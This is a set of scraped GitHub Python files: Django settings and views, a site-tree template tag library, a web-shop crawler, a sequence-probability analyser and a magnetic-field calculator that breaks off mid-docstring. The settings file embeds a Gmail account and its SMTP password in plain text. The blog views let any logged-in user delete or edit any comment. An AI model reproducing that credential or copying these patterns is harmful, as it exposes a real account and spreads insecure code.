Template, and Media directory locations!\nTEMPLATE_DIRS = ('flashcards/templates',)\nMEDIA_ROOT = 'media/'\nMEDIA_URL = '/media/'\nSTATIC_ROOT = ''\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = ('flashcards/static',)\nTHEME_ROOT = 'flashcards/static/themes/'\nTHEME_URL = STATIC_URL + 'themes/'\n\n# Application definition\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'flashcards',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'seteam3.urls'\n\nWSGI_APPLICATION = 'seteam3.wsgi.application'\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': 'flashcards.sqlite3',\n }\n}\n\n\n# Internationalization\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'UTC'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\n#Email setup for password change\nEMAIL_USE_TLS = True\nEMAIL_HOST = 'smtp.gmail.com'\nEMAIL_PORT = 587\nEMAIL_HOST_USER = 'flashcardsprojectset3@gmail.com'\nEMAIL_HOST_PASSWORD = 'FlashCard'\n \nDEFAULT_FROM_EMAIL = EMAIL_HOST_USER\nSERVER_EMAIL = EMAIL_HOST_USER","repo_name":"latreides/SE_Team3","sub_path":"seteam3/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"35889601892","text":"import random\nfrom django.http import JsonResponse\nfrom django.shortcuts import get_object_or_404, redirect, render\nimport requests\nfrom articles.forms import Comment, CommentForm\nfrom django.contrib.auth.decorators import login_required\n\nfrom articles.models import Article\ndef getArticleData():\n url = \"https://jsonblob.com/api/jsonBlob/1113201562272153600\"\n response = requests.get(url)\n if response.status_code == 200:\n json_datas = response.json()\n return json_datas[\"articles\"]\n else:\n return None \ndef index(request):\n articleList = []\n publishedArticles = Article.objects.filter(published=True) # Yalnızca yayınlanmış makaleleri filtrele\n for article in getArticleData():\n articleId = random.randint(100,250)\n articleTitle = article['title']\n articleContent = article['content']\n articleAuthor = article['author']\n articleInfo = {\n 'articleTitle': articleTitle,\n 'articleContent': articleContent,\n 'articleAuthor': articleAuthor,\n 'articleId':articleId,\n }\n articleList.append(articleInfo)\n \n context = {\"articleList\": articleList,\n \"publishedArticles\":publishedArticles}\n return render(request, \"index.html\", context)\n\n@login_required\ndef deleteComment(request, commentId):\n comment = get_object_or_404(Comment, id=commentId)\n # Yorumu silme işlemini gerçekleştirin\n comment.delete()\n # Silme işleminden sonra yapılacak işlemi belirleyin\n return redirect('article') # Örnek olarak yorumların bulunduğu sayfaya yönlendirme yapabilirsiniz\n\n@login_required\ndef editComment(request, commentId):\n comment = get_object_or_404(Comment, id=commentId)\n if request.method == \"POST\":\n form = CommentForm(request.POST, instance=comment)\n form.save()\n return redirect(\"index\")\n else:\n form = CommentForm(instance=comment)\n context={\"form\":form}\n return render(request,\"editComment.html\",context)","repo_name":"beratcankara/djangoBlog","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"28866377732","text":"import numpy as np\nimport pandas as pd\n\n'''\nName: calc_probs\nInput:\n *X: sequence to be analyzed\n *L: maximum sub-sequence length to be analyzed.\nOutput: \n *probabilities: a list of dictionaries. Each dictionary contains keys\n that are sequences of the same length. The value associated to a key\n is a probability of that subsequence appearing in the original sequence\n *alphabet: the unique symbols that appear in the sequence.\nDescription:\n Checks the number of occurances of subsequences of lengths from 1 to L.\n Divides the number of occurances by the sequence's length in order to\n obtain relative frequencies. Creates a dictionary for subsequences of \n each length. When checking for subsequences of length 1, the method \n records each individual symbol that appears and stores it as the\n sequence's alphabet.\n''' \ndef calc_probs(X, L):\n #Output lists, initialized as empty lists:\n probabilities = []\n alphabet = []\n print(\"Calculating subsequence probabilities\")\n print(\"L = \" + str(L))\n #This first loop iterates the subsequence length to be analyzed:\n for l in range(1, L + 1):\n print(\"Calculating probabilities of subsequences of length: \" + str(l))\n current_probs = {} #Dictionary storing the probabilities of current l\n #This loop traverses the string counting occurences of subsequences:\n for i in range(0, len(X) - (l - 1)):\n #current_value stores a string with the subsequence from position\n #i to position i+l\n current_value = ''.join(str(e) for e in X[i:i+l])\n #When l is 1, the unique symbols are stored in alphabet:\n if l == 1:\n if not (current_value in alphabet):\n alphabet.append(current_value)\n #If the key for current_value has not appeared yet, it is created\n #and its count starts at 1.\n if not current_value in current_probs.keys():\n current_probs[current_value] = 1\n #If the key has already shown up, its count is incremented.\n else:\n current_probs[current_value] += 1\n #After the sequence is analyzed, the counts for each key are divided by\n #the sequence's length in order to get probabilities:\n for key in current_probs.keys():\n current_probs[key] /= float(len(X))\n probabilities.append(current_probs)\n print(\"*****************\")\n print(\"Probabilities calculated!\")\n print(\"*****************\")\n return [probabilities, alphabet]\n\n'''\nName: calc_cond_probs\nInput:\n *probabilities: the sub-sequence probabilities of the original sequence;\n *alphabet: the set of unique symbols appearing in the original sequence; \n *L: maximum sub-sequence length to be analyzed.\nOutput: \n *conditional_probabilities: a list of dictionaries. Each dictionary \n contains keys that are of the form:\n symbol|subsequence\n meaning the probability of \"symbol\" occuring after that subsequence.\n There is one dictionary for each length of subsequence.\nDescription:\n Calculates the probability of each symbol in alphabet occuring each\n subsequence in probabilities and create a similiar dictionary for those\n conditional probabilities.\n''' \ndef calc_cond_probs(probabilities, alphabet, L):\n #Output initialized as empty list:\n conditional_probabilities = []\n print(\"Calculating subsequence conditional probabilities\")\n print(\"L = \" + str(L))\n if probabilities:\n #The first element, i.e. the probabilities of each symbol given the\n #empty string is just the probabilities of the occurence of those\n #symbols, i.e. the first element of the probabilities list.\n conditional_probabilities = [probabilities[0]]\n #This loop calculates the conditional probabilities of subsquences of\n #length greater than 0 given each symbol in the alphabet:\n for l in range(0, L):\n print(\"Calculating conditional probabilities of subsequences of length: \" + str(l))\n #Initialization of the empty dictionary for the current l:\n d = {}\n #l1 holds the probabilities of the layer l\n l1 = probabilities[l]\n #while l2 holds the probs of the layer l + 1\n l2 = probabilities[l+1]\n #loops for each subsequence s in the layer l:\n for s in l1:\n #loops for each symbol a in the alphabet:\n for a in alphabet:\n #The string cond, a|s, means symbol a given subsequence s\n cond = a + \"|\" + s\n #t holds the subsequence s concatenated with a, which should\n #be present in l2\n t = s + a\n #if t is a key in l2, i.e. it was present in the original \n #sequence:\n if t in l2.keys():\n #The probability of a given s is computed as the prob\n #of t divided by the prob of s:\n d[cond] = l2[t]/l1[s]\n else:\n #If not, the probability is simply zero:\n d[cond] = 0.0\n #The conditional probability dictionary of the current layer is \n #added to the output list:\n conditional_probabilities.append(d)\n else:\n print(\"Probabilities not computed.\")\n print(\"Run calc_probs function before this one.\")\n print(\"*****************\")\n print(\"Conditional probabilities calculated!\")\n print(\"*****************\")\n return conditional_probabilities\n","repo_name":"franchenstein/dcgram","sub_path":"sequenceanalyzer.py","file_name":"sequenceanalyzer.py","file_ext":"py","file_size_in_byte":5683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"8277015593","text":"from django import template\n\nfrom ..sitetreeapp import get_sitetree\n\nregister = template.Library()\n\n# All utility methods are implemented in SiteTree class\nsitetree = get_sitetree()\n\n\n@register.tag\ndef sitetree_tree(parser, token):\n \"\"\"Parses sitetree tag parameters.\n\n Two notation types are possible:\n 1. Two arguments:\n {% sitetree_tree from \"mytree\" %}\n Used to render tree for \"mytree\" site tree.\n\n 2. Four arguments:\n {% sitetree_tree from \"mytree\" template \"sitetree/mytree.html\" %}\n Used to render tree for \"mytree\" site tree using specific\n template \"sitetree/mytree.html\"\n\n \"\"\"\n tokens = token.split_contents()\n use_template = detect_clause(parser, 'template', tokens)\n tokens_num = len(tokens)\n\n if tokens_num in (3, 5):\n tree_alias = parser.compile_filter(tokens[2])\n return sitetree_treeNode(tree_alias, use_template)\n else:\n raise template.TemplateSyntaxError(\"%r tag requires two arguments. E.g. {%% sitetree_tree from \\\"mytree\\\" %%}.\" % tokens[0])\n\n\n@register.tag\ndef sitetree_children(parser, token):\n \"\"\"Parses sitetree_children tag parameters.\n\n Six arguments:\n {% sitetree_children of someitem for menu template \"sitetree/mychildren.html\" %}\n Used to render child items of specific site tree 'someitem'\n using template \"sitetree/mychildren.html\" for menu navigation.\n\n Basically template argument should contain path to current template itself.\n\n Allowed navigation types: 1) menu; 2) sitetree.\n\n \"\"\"\n tokens = token.split_contents()\n use_template = detect_clause(parser, 'template', tokens)\n tokens_num = len(tokens)\n\n if tokens_num == 5 and tokens[1] == 'of' and tokens[3] == 'for' and tokens[4] in ('menu', 'sitetree') and use_template is not None:\n tree_item = tokens[2]\n navigation_type = tokens[4]\n return sitetree_childrenNode(tree_item, navigation_type, use_template)\n else:\n raise template.TemplateSyntaxError(\"%r tag requires six arguments. E.g. {%% sitetree_children of someitem for menu template \\\"sitetree/mychildren.html\\\" %%}.\" % tokens[0])\n\n\n@register.tag\ndef sitetree_breadcrumbs(parser, token):\n \"\"\"Parses sitetree_breadcrumbs tag parameters.\n\n Two notation types are possible:\n 1. Two arguments:\n {% sitetree_breadcrumbs from \"mytree\" %}\n Used to render breadcrumb path for \"mytree\" site tree.\n\n 2. Four arguments:\n {% sitetree_breadcrumbs from \"mytree\" template \"sitetree/mycrumb.html\" %}\n Used to render breadcrumb path for \"mytree\" site tree using specific\n template \"sitetree/mycrumb.html\"\n\n \"\"\"\n tokens = token.split_contents()\n use_template = detect_clause(parser, 'template', tokens)\n tokens_num = len(tokens)\n\n if tokens_num == 3:\n tree_alias = parser.compile_filter(tokens[2])\n return sitetree_breadcrumbsNode(tree_alias, use_template)\n else:\n raise template.TemplateSyntaxError(\"%r tag requires two arguments. E.g. {%% sitetree_breadcrumbs from \\\"mytree\\\" %%}.\" % tokens[0])\n\n\n@register.tag\ndef sitetree_menu(parser, token):\n \"\"\"Parses sitetree_menu tag parameters.\n\n {% sitetree_menu from \"mytree\" include \"trunk,1,level3\" %}\n Used to render trunk, branch with id 1 and branch aliased 'level3'\n elements from \"mytree\" site tree as a menu.\n\n These are reserved aliases:\n * 'trunk' - items without parents\n * 'this-children' - items under item resolved as current for the current page\n * 'this-siblings' - items under parent of item resolved as current for\n the current page (current item included)\n * 'this-ancestor-children' - items under grandparent item (closest to root)\n for the item resolved as current for the current page\n\n {% sitetree_menu from \"mytree\" include \"trunk,1,level3\" template \"sitetree/mymenu.html\" %}\n\n \"\"\"\n tokens = token.split_contents()\n use_template = detect_clause(parser, 'template', tokens)\n tokens_num = len(tokens)\n\n if tokens_num == 5 and tokens[3] == 'include':\n tree_alias = parser.compile_filter(tokens[2])\n tree_branches = parser.compile_filter(tokens[4])\n return sitetree_menuNode(tree_alias, tree_branches, use_template)\n else:\n raise template.TemplateSyntaxError(\"%r tag requires four arguments. E.g. {%% sitetree_menu from \\\"mytree\\\" include \\\"trunk,1,level3\\\" %%}.\" % tokens[0])\n\n\n@register.tag\ndef sitetree_url(parser, token):\n \"\"\"This tag is much the same as Django built-in 'url' tag.\n The difference is that after 'for' it should get TreeItem object.\n\n \"\"\"\n tokens = token.contents.split()\n tokens_num = len(tokens)\n as_var = False\n\n if tokens_num >= 3 and tokens[1] == 'for':\n if tokens[-2] == 'as':\n as_var = tokens[-1]\n tokens = tokens[:-2]\n sitetree_item = parser.compile_filter(tokens[2])\n return sitetree_urlNode(sitetree_item, as_var)\n else:\n raise template.TemplateSyntaxError(\"%r tag should look like {%% sitetree_url for someitem params %%}.\" % tokens[0])\n\n\n@register.tag\ndef sitetree_page_title(parser, token):\n \"\"\"Renders a title for current page, resolved against sitetree item representing current URL.\"\"\"\n tokens = token.split_contents()\n\n if len(tokens) == 3:\n tree_alias = parser.compile_filter(tokens[2])\n return sitetree_page_titleNode(tree_alias)\n else:\n raise template.TemplateSyntaxError(\"%r tag requires two arguments. E.g. {%% sitetree_page_title from \\\"mytree\\\" %%}.\" % tokens[0])\n\n\n@register.tag\ndef sitetree_page_description(parser, token):\n \"\"\"Renders a description for the current page, resolved against sitetree item representing current URL.\"\"\"\n tokens = token.split_contents()\n\n if len(tokens) == 3:\n tree_alias = parser.compile_filter(tokens[2])\n return sitetree_page_descriptionNode(tree_alias)\n else:\n raise template.TemplateSyntaxError(\"%r tag requires two arguments. E.g. {%% sitetree_page_description from \\\"mytree\\\" %%}.\" % tokens[0])\n\n\n@register.tag\ndef sitetree_page_hint(parser, token):\n \"\"\"Renders a hint for the current page, resolved against sitetree item representing current URL.\"\"\"\n tokens = token.split_contents()\n\n if len(tokens) == 3:\n tree_alias = parser.compile_filter(tokens[2])\n return sitetree_page_hintNode(tree_alias)\n else:\n raise template.TemplateSyntaxError(\"%r tag requires two arguments. E.g. {%% sitetree_page_hint from \\\"mytree\\\" %%}.\" % tokens[0])\n\n\nclass sitetree_treeNode(template.Node):\n \"\"\"Renders tree items from specified site tree.\"\"\"\n\n def __init__(self, tree_alias, use_template):\n self.use_template = use_template\n self.tree_alias = tree_alias\n\n def render(self, context):\n tree_items = sitetree.tree(self.tree_alias, context)\n return render(context, tree_items, self.use_template or 'sitetree/tree.html')\n\n\nclass sitetree_childrenNode(template.Node):\n \"\"\"Renders tree items under specified parent site tree item.\"\"\"\n\n def __init__(self, tree_item, navigation_type, use_template):\n self.use_template = use_template\n self.tree_item = tree_item\n self.navigation_type = navigation_type\n\n def render(self, context):\n return sitetree.children(self.tree_item, self.navigation_type, self.use_template.resolve(context), context)\n\n\nclass sitetree_breadcrumbsNode(template.Node):\n \"\"\"Renders breadcrumb trail items from specified site tree.\"\"\"\n\n def __init__(self, tree_alias, use_template):\n self.use_template = use_template\n self.tree_alias = tree_alias\n\n def render(self, context):\n tree_items = sitetree.breadcrumbs(self.tree_alias, context)\n return render(context, tree_items, self.use_template or 'sitetree/breadcrumbs.html')\n\n\nclass sitetree_menuNode(template.Node):\n \"\"\"Renders specified site tree menu items.\"\"\"\n\n def __init__(self, tree_alias, tree_branches, use_template):\n self.use_template = use_template\n self.tree_alias = tree_alias\n self.tree_branches = tree_branches\n\n def render(self, context):\n tree_items = sitetree.menu(self.tree_alias, self.tree_branches, context)\n return render(context, tree_items, self.use_template or 'sitetree/menu.html')\n\n\nclass sitetree_urlNode(template.Node):\n \"\"\"Resolves and renders specified url.\"\"\"\n\n def __init__(self, sitetree_item, as_var):\n self.sitetree_item = sitetree_item\n self.as_var = as_var\n\n def render(self, context):\n resolved_url = sitetree.url(self.sitetree_item, context)\n if self.as_var:\n context[self.as_var] = resolved_url\n return ''\n return resolved_url\n\n\nclass sitetree_page_titleNode(template.Node):\n \"\"\"Renders a page title from the specified site tree.\"\"\"\n\n def __init__(self, tree_alias):\n self.tree_alias = tree_alias\n\n def render(self, context):\n return sitetree.get_current_page_title(self.tree_alias, context)\n\n\nclass sitetree_page_descriptionNode(template.Node):\n \"\"\"Renders a page description from the specified site tree.\"\"\"\n\n def __init__(self, tree_alias):\n self.tree_alias = tree_alias\n\n def render(self, context):\n return sitetree.get_current_page_attr('description', self.tree_alias, context)\n\n\nclass sitetree_page_hintNode(template.Node):\n \"\"\"Renders a page hint from the specified site tree.\"\"\"\n\n def __init__(self, tree_alias):\n self.tree_alias = tree_alias\n\n def render(self, context):\n return sitetree.get_current_page_attr('hint', self.tree_alias, context)\n \n\ndef detect_clause(parser, clause_name, tokens):\n \"\"\"Helper function detects a certain clause in tag tokens list.\n Returns its value.\n\n \"\"\"\n if clause_name in tokens:\n t_index = tokens.index(clause_name)\n clause_value = parser.compile_filter(tokens[t_index + 1])\n del tokens[t_index:t_index + 2]\n else:\n clause_value = None\n return clause_value\n\n\ndef render(context, tree_items, use_template):\n \"\"\"Render helper is used by template node functions\n to render given template with given tree items in context.\n\n \"\"\"\n context.push()\n context['sitetree_items'] = tree_items\n\n if isinstance(use_template, template.FilterExpression):\n use_template = use_template.resolve(context)\n\n content = template.loader.get_template(use_template).render(context)\n context.pop()\n\n return content\n","repo_name":"behappyyoung/PythonSampleCodes","sub_path":"Django/forheroku/vir_env/lib/python2.7/site-packages/sitetree/templatetags/sitetree.py","file_name":"sitetree.py","file_ext":"py","file_size_in_byte":10613,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"50"} +{"seq_id":"38276274881","text":"import os\r\nfrom os.path import basename\r\n\r\nfrom bs4 import BeautifulSoup\r\nfrom PIL import Image\r\nimport requests\r\nimport re\r\n\r\nfrom products.models import Category, Product\r\n\r\n\r\ndef category_crawler():\r\n base_url = \"https://berozkala.com\"\r\n response = requests.get(base_url)\r\n soup = BeautifulSoup(response.text, features='html.parser')\r\n result_set = soup.select(\"#navigation > ul > li > a\")\r\n for page_element in result_set:\r\n s = BeautifulSoup(str(page_element), features='html.parser')\r\n for a in s.find_all('a', href=True):\r\n Category.objects.create(name=a.text.strip(), url=(base_url + a['href']))\r\n\r\n\r\ndef product_crawler(category):\r\n response = requests.get(category.url)\r\n soup = BeautifulSoup(response.text, features='html.parser')\r\n names = soup.select(\r\n '#mweb-site-wrap > div > div > div > div.content-wrap.content-with-sidebar.col-md-27.col-xs-36 > nav > ul > '\r\n 'li > div > div > div.product-detail-area > h3 > a')\r\n prices = soup.select(\r\n '#mweb-site-wrap > div > div > div > div.content-wrap.content-with-sidebar.col-md-27.col-xs-36 > nav > ul > '\r\n 'li > div > div > div.product-detail-area > span > ins > span')\r\n\r\n images = soup.select(\r\n '#mweb-site-wrap > div > div > div > div.content-wrap.content-with-sidebar.col-md-27.col-xs-36 > nav > ul > '\r\n 'li > div > div > div.product-image-area > a > img')\r\n\r\n urls = soup.select(\r\n '#mweb-site-wrap > div > div > div > div.content-wrap.content-with-sidebar.col-md-27.col-xs-36 > nav > ul > '\r\n 'li > div > div > div.product-image-area > a'\r\n )\r\n\r\n image_path = 'media/products'\r\n try:\r\n os.mkdir(image_path)\r\n except FileExistsError:\r\n pass\r\n for name, price, url, image in list(zip(names, prices, urls, images)):\r\n image_url = 'https://berozkala.com' + image['src']\r\n image_file = Image.open(requests.get(image_url, stream=True).raw)\r\n image_file.save('{}/{}'.format(image_path, basename(image['src'])))\r\n\r\n product_url = 'https://berozkala.com' + url['href']\r\n\r\n Product.objects.create(name=name.text, price=int(re.sub(\"\\\\D\", \"\", price.text)), category=category,\r\n image='{}/{}'.format(image_path.split('/')[1], basename(image['src'])), url=product_url)\r\n","repo_name":"aminmohammadlou/berozkala_crawler","sub_path":"berozkala_crawler/products/utils/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"16395354925","text":"from cmath import rect\nfrom math import radians\n\nimport numpy as np\nfrom numpy.core.fromnumeric import shape\n\nfrom .config import MU_ZERO, PI\n\n\ndef _which_iterator(subparser_type):\n '''\n Based on the subparser type, it returns the corresponding iterator useful in \"for\" loops in the calculation and graphical part.\n\n Parameters\n -------------------\n subparser_type : str\n Parsed argument, indicating the subparser called in the command line.\n\n Returns\n -------------------\n iter_triad : int\n Iterator useful in \"for\" loops.\n '''\n if subparser_type == 'single':\n iter_triad = 1\n elif subparser_type == 'double':\n iter_triad = 2\n return iter_triad\n\n\ndef calc_B_phasors(current, xp, yp, cable_array):\n\n \"\"\"It calculates the phasors of the x and y components of the\n magnetic induction field B in a given point for a given cable.\n\n Given the input, the function rectifies the current phase\n extracting respectively the real and imaginary part of it.\n Then, both real and imaginary part of x and y components are\n multiplied by a transfer function (dependent on the spatial\n disposition of the cable in respect to the point of interest)\n resulting in the magnetic inductin B phasor components of a\n single cable.\n\n Parameters\n -------------------\n current : int\n Current (A) circulating inside the considered power line\n (composed of a triad of cables)\n xp, yp : float\n Abscissa (m) and ordinate (m) of the point of interest where\n the magnetic induction field B will be calculated at last\n cable_array : numpy.ndarray\n First column - Current phase belonging to the n-th cable under consideration\n Second and third columns - Abscissa and ordinate of the n-th cable under consideration\n\n Returns\n -------------------\n B_phasors_n : numpy.ndarray\n Respectively the real and imaginary part (columns) of the\n x and y components (rows) of the magnetic induction field B\n produced by a single cable in a given point\n\n Notes\n -------------------\n The current function implements the calculations present both in\n [1]_\"Norma Italiana CEI 106-11\" formulas (5) and [2]_\"Norma Italiana\n CEI 211-4\" formulas (16).\n\n References\n -------------------\n ..[1] Norma Italiana CEI 106-11, \"Guide for the determination of\n the respect widths for power lines and substations according to\n DPCM 8 July 2003 (Clause 6) - Part 1: Overhead lines and cables\",\n first edition, 2006-02.\n ..[2] Norma Italiana CEI 211-4, \"Guide to calculation methods of\n electric and magnetic fields generated by power-lines and electrical\n substations\", second edition, 2008-09.\n \"\"\"\n\n ph_n_rad = radians(cable_array[0])\n I_complex = rect(current, ph_n_rad)\n I_components = np.array([I_complex.real, I_complex.imag])\n coef = (MU_ZERO / (2*PI)) / ((xp - cable_array[1])**2 + (yp - cable_array[2])**2)\n transfer_fn_n = np.array([(cable_array[2] - yp) * coef, (xp - cable_array[1]) * coef]).reshape(2, 1)\n B_phasors_n = I_components * transfer_fn_n\n return B_phasors_n\n\n\ndef calc_B_effective(*B_phasors):\n\n \"\"\"It calculates the effective value of the magnetic induction field B\n (microTesla) in a given point, considering the magnetic induction of\n all the cables provided.\n\n Firstly, the function computes the resulting real and imaginary parts\n of the x and y magnetic induction field components considering all the\n contributing cables given as input (typically three or six cables).\n The 'B_components' 2x2 numpy matrix indicates this intermediate step.\n\n Secondly, the module of the effective magnetic induction field B is\n calculated as the squared root of the sum of the squares of the\n components mentioned above.\n\n Lastly, the result is transformed from Tesla units to micro Tesla units.\n\n Parameters\n -------------------\n *B_phasors : numpy.ndarray\n Respectively the real and imaginary part (columns) of the\n x and y components (rows) of the magnetic induction field B\n produced by a single cable in a given point\n\n Returns\n -------------------\n B_effective_microT : float\n Effective magnetic induction field B (microTesla) calculated in the given point\n\n Notes\n -------------------\n The current function implements the calculations present both in\n [1]_\"Norma Italiana CEI 106-11\" formulas (3-4) and [2]_\"Norma Italiana\n CEI 211-4\" formulas (17).\n\n References\n -------------------\n ..[1] Norma Italiana CEI 106-11, \"Guide for the determination of\n the respect widths for power lines and substations according to\n DPCM 8 July 2003 (Clause 6) - Part 1: Overhead lines and cables\",\n first edition, 2006-02.\n ..[2] Norma Italiana CEI 211-4, \"Guide to calculation methods of\n electric and magnetic fields generated by power-lines and electrical\n substations\", second edition, 2008-09.\n \"\"\"\n B_components = 0\n for B_phasor in B_phasors:\n B_components += B_phasor\n B_effective_T = np.sqrt(np.sum(B_components**2))\n B_effective_microT = B_effective_T*10**(6)\n return B_effective_microT\n\n\ndef main_point(current_s, xp, yp, diam_cables, cables_array, subparser_type):\n \"\"\"Given one or two triads of cables (i.e. power lines), the function\n computes the composed effective magnetic induction B in a given point.\n\n The respective phasors of the magnetic induction B of each cable\n are iteratively computed and then composed to obtain the result.\n\n N.B. - In case the point of interest is too close to one of the cables,\n i.e. inside the 2D space effectively occupied by the cables,\n a dummy B value of 9999 microTesla is returned.\n This is done in order to not nullify the denominator.\n\n Parameters\n -------------------\n current_s : numpy.ndarray\n Current (A) circulating inside the considered power line/lines\n (each one composed of a triad of cables)\n xp, yp : float\n Abscissa (m) and ordinate (m) of the point of interest where\n the magnetic induction field B will be calculated at last\n diam_cables : float\n Diameter (m) of the cables in use\n cable_array : numpy array\n First column - Current phase belonging to the n-th cable under consideration\n Second and third columns - Abscissa and ordinate of the n-th cable under consideration\n\n Returns\n -------------------\n B_eff : float\n Effective magnetic induction field B (microTesla) calculated in the given point\n \"\"\"\n point_P = np.array((xp, yp))\n radius_cable = diam_cables/2\n B_phasors_cables = np.zeros((2, 3, 2, 2))\n #2 super-sets (two triads), 3 sets (three cables each), 2 row each, 2 columns each\n\n iter_triad = _which_iterator(subparser_type)\n for j in range(iter_triad):\n for i in range(3):\n if np.sum(np.square(point_P - np.array((cables_array[j, i, 1], cables_array[j, i, 2])))) < radius_cable:\n B_dummy = 9999\n return B_dummy\n B_phasors_cables[j, i,] = calc_B_phasors(current_s[j], xp, yp, cables_array[j, i,])\n B_eff = calc_B_effective(B_phasors_cables[0, 0, ], B_phasors_cables[0, 1, ], B_phasors_cables[0, 2, ],\n B_phasors_cables[1, 0, ], B_phasors_cables[1, 1, ], B_phasors_cables[1, 2, ],)\n return B_eff\n\n\ndef main_grid(current_s, xp, yp, diam_cables, cables_array, subparser_type):\n '''\n It calculates the B values of a 2D grid centered in the point of interest,\n with 6m side and 50cm step.\n\n In case a dummy B values is found, it replaces them with\n the maximum B value calculated (other than 9999 microTesla).\n\n Parameters\n -------------------\n current_s : numpy.ndarray\n Current (A) circulating inside the considered power line/lines\n (each one composed of a triad of cables)\n xp, yp : float\n Abscissa (m) and ordinate (m) of the point of interest where\n the magnetic induction field B will be calculated at last\n diam_cables : float\n Diameter (m) of the cables in use\n cable_array : numpy array\n First column - Current phase belonging to the n-th cable under consideration\n Second and third columns - Abscissa and ordinate of the n-th cable under consideration\n subparser_type : str\n Parsed argument, indicating the subparser called in the command line.\n\n Returns\n -------------------\n x, y, z_grid : numpy.ndarray\n (1D) Abscissas (m) and ordinates (m) having the point of interest in their center.\n (2D) B values corresponding to the (x,y) couples.\n '''\n nx, ny = 13, 13\n x = np.linspace(xp-3, xp+3, nx)\n y = np.linspace(yp-3, yp+3, ny)\n z_grid = np.zeros((ny, nx))\n X, Y = np.meshgrid(x, y, sparse=True, indexing='xy')\n #cartesian indexing: treat X[j, i] Y[j, i]\n\n for i in range(nx):\n for j in range(ny):\n z_grid[j, i] = main_point(current_s, X[0, i], Y[j, 0], diam_cables, cables_array, subparser_type)\n\n index_dummy = np.where(z_grid == 9999)\n z_grid[index_dummy] = np.unique(z_grid)[-2]\n return x, y, z_grid\n\n\ndef centroid(cables_array, subparser_type):\n '''\n It calculates the abscissa (m) and ordinate (m) of the cables' center of gravity.\n\n Parameters\n -------------------\n cable_array : numpy array\n First column - Current phase belonging to the n-th cable under consideration\n Second and third columns - Abscissa and ordinate of the n-th cable under consideration\n subparser_type : str\n Parsed argument, indicating the subparser called in the command line.\n\n Returns\n -------------------\n xg, yg : float\n Abscissa (m) and ordinate (m) of the cables' center of gravity\n '''\n num_cables = 3\n iter_triad = _which_iterator(subparser_type)\n coord_sum = np.nansum(np.sum(cables_array, axis=1), axis=0)\n x_sum, y_sum = coord_sum[1], coord_sum[2]\n xg, yg = x_sum/(num_cables*iter_triad), y_sum/(num_cables*iter_triad)\n return xg, yg\n\n\ndef is_underground(cables_array, subparser_type):\n '''\n It checks if the cables' configuration is underground, that is: the cables are extremely close to each other (i.e. 0.5 meters)\n In case, sets the parameters of the space subdivision operated through the \"linspace\" function.\n\n Parameters\n -------------------\n cable_array : numpy array\n First column - Current phase belonging to the n-th cable under consideration\n Second and third columns - Abscissa and ordinate of the n-th cable under consideration\n subparser_type : str\n Parsed argument, indicating the subparser called in the command line.\n\n Returns\n -------------------\n delta, nx : int\n The unilateral distance (m) that will be used along x and y axis to investigate the surrounding of the point of interest.\n Number of intervals into which the bilateral distances to investigate (having xp, yp as the middle point) will be divided.\n\n Notes\n -------------------\n To check if the cables are underground the relative distance is used, instead of just checking the ordinates (that should be negative).\n This is because, hypothetically, the reference system origin could be put anywhere.\n For convenience, the documentation strongly recommends where to place this origin.\n '''\n\n iter_triad = _which_iterator(subparser_type)\n num_cables = 3\n\n for j in range(iter_triad):\n for i in range(num_cables):\n if np.linalg.norm(np.array((cables_array[j, i-1, 1], cables_array[j, i-1, 2]))-np.array((cables_array[j, i, 1], cables_array[j, i, 2]))) < 0.5:\n delta, nx = 6, 121\n else:\n delta, nx = 35, 71\n return delta, nx\n\n\ndef lim_val_checker(xg, x, nx, z_array, lim_val):\n '''\n It checks on both sides of the trellis at which abscissa (m) the given limit value (microTesla) is exceeded.\n The ordinate (m) at which the computation is done is fixed and it corresponds to yg, the cables' center of gravity.\n\n Parameters\n -------------------\n xg : float\n Abscissa (m) of the cables' center of gravity\n x, z_array : numpy.ndarray\n (1D) Abscissas (m) having the cables' center of gravity xg in their center and (1D) B values corresponding to the (x,yg) couples\n nx : int\n Number of intervals into which the bilateral distances to investigate (having xg, yg as the middle point) will be divided\n lim_val : list of float\n MicroTesla value at which is estimated the DPA (distanza di prima approssimazione)\n\n Returns\n -------------------\n dpa_value : float\n Value of the estimated DPA (distanza di prima approssimazione) at the given limit value\n '''\n\n dpa_left_right = np.zeros(2)\n for i in range(nx-1):\n if z_array[i] <= lim_val < z_array[i+1]:\n dpa_left_right[0] = xg-x[i]\n if z_array[i] > lim_val >= z_array[i+1]:\n dpa_left_right[1] = x[i+1]-xg\n dpa_value = np.max(dpa_left_right)\n return dpa_value\n\n\ndef main_dpa(current_s, diam_cables, cables_array, subparser_type, lim_val):\n '''\n It calculates the DPA (distanza di prima approssimazione - meters) at the given limit value (microTesla).\n A single value is provided, meaning a symmetrical DPA with respect to the cables' center of gravity abscissa xg.\n\n Parameters\n -------------------\n current_s : numpy.ndarray\n Current (A) circulating inside the considered power line/lines\n (each one composed of a triad of cables)\n diam_cables : float\n Diameter (m) of the cables in use\n cable_array : numpy array\n First column - Current phase belonging to the n-th 